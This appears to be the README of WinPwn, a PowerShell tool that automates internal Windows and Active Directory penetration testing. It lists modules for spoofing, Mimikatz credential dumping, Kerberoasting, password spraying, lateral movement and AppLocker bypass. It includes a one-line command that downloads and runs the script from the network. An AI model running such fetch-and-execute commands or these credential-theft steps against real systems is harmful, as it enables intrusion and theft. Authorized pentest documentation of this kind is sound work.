Automation for internal Windows Penetrationtest / AD-Security - Still much work to do
Clone or download
Latest commit 86b0cc1 Jan 17, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information. Update Jan 17, 2019
WinPwn_v0.5.ps1 Bug Fix Inveigh Jan 8, 2019
Windows PowerShell.png Screenshot add May 30, 2018
oBEJHzXyARrq.exe Psattack Added Mar 27, 2018


Still much work to do - Automation for internal Windows Penetrationtest.

1) Automatic Proxy Detection
2) Elevated or unelevated Detection
3) Forensic Mode oder Pentest Mode 
	a. Forensik -> Loki + PSRECON + Todo: Threathunting functions
	b. Pentest -> Internal Windows Domain System 
		i. Inveigh NBNS/SMB/HTTPS Spoofing
		ii. Local Reconing -> Hostenum, SessionGopher, FileSearch, PSRecon
		iii. Domain Reconing -> GetExploitableSystems, Powerview functions, ACL-Analysis, ADRecon
			1) Todo: Grouper for Group Policy overview
		iv. Privilege Escalation -> Powersploit (Allchecks), GPP-Passwords,  MS-Exploit Search (Sherlock), WCMDump, JAWS
		v. Lazagne Password recovery
		vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with Admin-rights
		vii. LateralMovement ->  FindLocalAdminAccess 
			1) Invoke-MassMimikatz || Powershell Empire Remote Launcher Execution over WMI
			2) DomainPasswordspray
		viii. Share Enumeration
		ix. FindGPOLocation --> Search for user/group rights 
		x. Find-Fruit

Just Import the Modules with "Import-Module .\WinPwn_v0.5.ps1" or with iex (new-object net.webclient).downloadstring('')

Functions available after Import:

  1. isadmin -> Checks for local admin access

  2. Inveigh -> Executes Inveigh in a new Console window (

  3. sessionGopher -> Executes Sessiongopher in memory (

  4. Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz after with admin rights (

  5. localreconmodules -> Executes different Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (,,

  6. JAWS -> Just another Windows Privilege Escalation script gets executed

  7. domainreconmodules -> Different Powerview situal awareness functions get executed and the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated as CSV Files (or XLS if excel is installed) with ADRecon. (,,

  8. Privescmodules -> Executes different privesc scripts in memory (Sherlock, PowerUp, GPP-Files, WCMDump)

  9. lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (

  10. latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be done here.

  11. empirelauncher -> Launch powershell empire oneliner for remote Systems (

  12. shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit)

  13. groupsearch -> FindGPOLocation (Powerview / Powersploit)

  14. Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking

  15. WinPwn -> Guides the user through all functions/Modules with simple questions.

The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (

alt text

Legal disclaimer:

Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.